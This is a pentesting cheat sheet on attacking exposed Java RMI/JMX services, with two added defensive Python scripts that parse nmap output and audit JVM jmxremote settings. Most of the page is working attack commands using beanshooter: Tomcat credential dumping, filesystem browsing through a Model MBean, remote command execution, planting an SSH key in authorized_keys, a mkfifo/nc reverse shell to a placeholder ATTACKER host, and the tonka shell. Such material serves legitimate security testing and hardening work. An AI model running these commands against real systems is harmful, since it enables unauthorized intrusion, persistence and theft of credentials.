
# Pentesting Java RMI/JMX

## Discovery

```bash
# Nmap identifies RMI
nmap -sC -sV TARGET -p 1099,2222,9010

# Common RMI output
2222/tcp open  java-rmi   Java RMI
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
```

**Common Ports:**

* 1099 - Default RMI registry
* 2222 - Alternative RMI
* 9010 - JMX remote
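
The `rmi-dumpregistry` output above is what an inventory or triage script should key on: a bound name of `jmxrmi` whose class is `javax.management.remote.rmi.RMIServerImpl_Stub` means the registry hands out a JMX connector, which is the case the rest of this page covers. The parser below is an added example (not part of this page or of nmap); the sample scan text is constructed to mirror the output shown above, with an extra non-JMX registry on 1099 and an empty dump on 9010 so the difference is visible.

```python
"""Parse nmap output for Java RMI registries and flag exposed JMX connectors.

Added example for asset-inventory / triage work; not part of the original page.
The input text is constructed to mirror nmap's rmi-dumpregistry layout.
"""
import re
from typing import Dict, List, Optional

# Constructed sample: the 2222 block mirrors the page; 1099 is an added
# registry exposing a non-JMX object, 9010 an RMI port with no dump.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE    VERSION
1099/tcp open  java-rmi   Java RMI
| rmi-dumpregistry:
|   Calculator
|     example.CalculatorImpl_Stub
2222/tcp open  java-rmi   Java RMI
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
9010/tcp open  java-rmi   Java RMI
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
BOUND_NAME = re.compile(r"^\|   (\S+)$")     # exactly three spaces: a bound name
BOUND_CLASS = re.compile(r"^\|     (\S+)$")  # five spaces: the class under that name

JMX_STUB = "javax.management.remote.rmi.RMIServerImpl_Stub"


def parse_rmi_registries(text: str) -> List[Dict]:
    """Return one record per open java-rmi port: {'port': int, 'bound': {name: class}}."""
    findings: List[Dict] = []
    current: Optional[Dict] = None
    in_dump = False
    last_name: Optional[str] = None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            in_dump = False
            last_name = None
            if m.group(3) == "java-rmi":
                current = {"port": int(m.group(1)), "bound": {}}
                findings.append(current)
            else:
                current = None
            continue
        if current is None:
            continue
        if line.startswith("| rmi-dumpregistry:"):
            in_dump = True
            continue
        if not in_dump:
            continue
        m = BOUND_NAME.match(line)
        if m:
            last_name = m.group(1)
            current["bound"][last_name] = None
            continue
        m = BOUND_CLASS.match(line)
        # Only the first class line under a name is its type; nmap may print
        # further indented lines (e.g. "extends") that we deliberately ignore.
        if m and last_name is not None and current["bound"][last_name] is None:
            current["bound"][last_name] = m.group(1)
    return findings


def jmx_exposures(findings: List[Dict]) -> List[int]:
    """Ports whose registry exposes a JMX connector (jmxrmi / RMIServerImpl_Stub)."""
    return [
        f["port"]
        for f in findings
        if any(name == "jmxrmi" or cls == JMX_STUB for name, cls in f["bound"].items())
    ]


if __name__ == "__main__":
    parsed = parse_rmi_registries(SAMPLE_NMAP_OUTPUT)
    for rec in parsed:
        print(rec["port"], rec["bound"])
    print("JMX exposed on:", jmx_exposures(parsed))
```

Feed it `nmap -sC -sV ... -oN scan.txt` output and the `jmx_exposures` list is the set of ports to take into the beanshooter enumeration step (or, on the defending side, the set that should not be reachable from outside the management network at all).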

***

## remote-method-guesser (rmg)

Tool for enumerating Java RMI endpoints and scanning them for known vulnerabilities.

### Installation

```bash
# Download release
wget https://github.com/qtc-de/remote-method-guesser/releases/download/v5.1.0/rmg-5.1.0-jar-with-dependencies.jar
```

### Enumeration

```bash
# Basic enumeration
java -jar rmg-5.1.0-jar-with-dependencies.jar enum TARGET 2222

# Output shows:
# - Bound names (jmxrmi)
# - Codebase enumeration
# - Security manager status
# - JEP290 status
# - CVE-2019-2684 status
```

### Method Guessing

```bash
# Guess available methods
java -jar rmg-5.1.0-jar-with-dependencies.jar guess TARGET 2222

# Example output:
# [+] - jmxrmi
# [+]         --> String getVersion()
# [+]         --> javax.management.remote.rmi.RMIConnection newClient(Object params)
```

### Known Objects Info

```bash
# Get info on known RMI objects
java -jar rmg-5.1.0-jar-with-dependencies.jar known javax.management.remote.rmi.RMIServerImpl_Stub

# Shows vulnerabilities like MLet and Deserialization attacks
```

***

## Beanshooter (JMX Exploitation)

Tool for enumerating and attacking JMX endpoints.

### Installation

```bash
# Download release
wget https://github.com/qtc-de/beanshooter/releases/download/v4.1.0/beanshooter-4.1.0-jar-with-dependencies.jar

# Or build from source for full features (tonka shell)
sudo apt install maven
git clone https://github.com/qtc-de/beanshooter
cd beanshooter
mvn package
cd tonka-bean/
mvn package
```

### Enumeration

```bash
# Basic enumeration
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222

# Check for unauthorized access, deserialization, available MBeans
# [+] - Remote MBean server does not require authentication.
#       Vulnerability Status: Vulnerable
```
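
The "does not require authentication" result above is the remote side of a handful of `com.sun.management.jmxremote.*` JVM properties: the connector exists when `...port` is set, and `authenticate` and `ssl` default to `true` unless the launch line turns them off. The audit script below is an added example (not part of this page or of beanshooter) that reads those properties from a `-D` argument list or a `management.properties` file and returns finding codes; the weak launch line and the hardened properties file are constructed, and the file paths in them are hypothetical.

```python
"""Audit a JVM's remote JMX settings for the weaknesses beanshooter's enum reports.

Added example, not part of the original page or of beanshooter. Only the
standard com.sun.management.jmxremote.* properties are inspected; sample
inputs are constructed and the paths in them are hypothetical.
"""
from typing import Dict, Iterable, List

PREFIX = "com.sun.management.jmxremote"

# Constructed: the kind of launch line that yields
# "Remote MBean server does not require authentication."
WEAK_JVM_ARGS = [
    "-Dcom.sun.management.jmxremote",
    "-Dcom.sun.management.jmxremote.port=2222",
    "-Dcom.sun.management.jmxremote.rmi.port=2222",
    "-Dcom.sun.management.jmxremote.authenticate=false",
    "-Dcom.sun.management.jmxremote.ssl=false",
]

# Constructed: the same connector with password/role files, TLS and client certs.
HARDENED_PROPERTIES = """\
# management.properties (hypothetical paths)
com.sun.management.jmxremote.port=2222
com.sun.management.jmxremote.rmi.port=2222
com.sun.management.jmxremote.authenticate=true
com.sun.management.jmxremote.password.file=/etc/app/jmxremote.password
com.sun.management.jmxremote.access.file=/etc/app/jmxremote.access
com.sun.management.jmxremote.ssl=true
com.sun.management.jmxremote.ssl.need.client.auth=true
"""


def parse_jvm_args(args: Iterable[str]) -> Dict[str, str]:
    """Collect -Dkey=value (and bare -Dkey, stored as 'true') into a dict."""
    props: Dict[str, str] = {}
    for arg in args:
        if not arg.startswith("-D"):
            continue
        key, sep, value = arg[2:].partition("=")
        props[key] = value if sep else "true"
    return props


def parse_management_properties(text: str) -> Dict[str, str]:
    """Minimal java.util.Properties reader: key=value lines, '#'/'!' comments."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def audit_jmx(props: Dict[str, str]) -> List[str]:
    """Return finding codes for the remote JMX connector described by props.

    JDK defaults apply: authenticate and ssl are on unless set to 'false';
    ssl.need.client.auth is off unless set to 'true'. Without ...port there
    is no out-of-process connector from these settings (an application may
    still open its own, which this check does not see).
    """
    if f"{PREFIX}.port" not in props:
        return []

    def flag(name: str, default: str = "true") -> bool:
        return props.get(f"{PREFIX}.{name}", default).lower() == "true"

    findings: List[str] = []
    if not flag("authenticate"):
        findings.append("UNAUTHENTICATED_REMOTE_JMX")  # beanshooter: Vulnerability Status: Vulnerable
    elif f"{PREFIX}.password.file" not in props:
        findings.append("JDK_DEFAULT_PASSWORD_FILE")   # relies on the JDK's conf/management/jmxremote.password
    if not flag("ssl"):
        findings.append("NO_TLS")                      # credentials and serialized calls travel in clear text
    elif not flag("ssl.need.client.auth", "false"):
        findings.append("NO_CLIENT_CERT")              # TLS without mutual authentication
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_jmx(parse_jvm_args(WEAK_JVM_ARGS)))
    print("hardened:", audit_jmx(parse_management_properties(HARDENED_PROPERTIES)))
```

Run it over `ps -o args` output or the service's `management.properties`; an empty list for the hardened file is the state in which the `enum` command above no longer reports the MBean server as open, while `UNAUTHENTICATED_REMOTE_JMX` is exactly the condition every later section of this page builds on.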

### Enumerate Tomcat Users via JMX

```bash
# If JMX is connected to Tomcat, can enumerate users
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222

# Output:
# [+] Enumerating tomcat users:
# [+]     - Listing 2 tomcat users:
# [+]             Username:  manager
# [+]             Password:  fhErvo2r9wuTEYiYgt
# [+]             Roles: manage-gui
```

### List MBeans

```bash
java -jar beanshooter-4.1.0-jar-with-dependencies.jar list TARGET 2222
java -jar beanshooter-4.1.0-jar-with-dependencies.jar info TARGET 2222
```

### File System Access via Model MBean

Deploy a Model MBean with java.io.File to enumerate the filesystem:

```bash
# Deploy MBean with java.io.File
java -jar beanshooter-4.1.0-jar-with-dependencies.jar model TARGET 2222 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'

# List directory contents
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()'

# Change directory
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/home")' objectReference

# List new directory
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()'
```

### Remote Code Execution via StandardMBean

```bash
# Execute command (uses TemplateImpl payload)
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'whoami'

# Write SSH key
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'echo "ssh-ed25519 AAAA..." >> /home/user/.ssh/authorized_keys'

# Reverse shell (may need /bin/bash wrapper)
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec '/bin/bash -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER 9001 >/tmp/f"'
```

### Tonka Shell (Full Build Required)

```bash
# Deploy tonka
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 tonka

# Get interactive shell
java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell TARGET 2222
[tomcat@TARGET /]$ whoami
tomcat
```

***

## References

* <https://book.hacktricks.wiki/en/network-services-pentesting/1099-pentesting-java-rmi.html>
* <https://github.com/qtc-de/remote-method-guesser>
* <https://github.com/qtc-de/beanshooter>
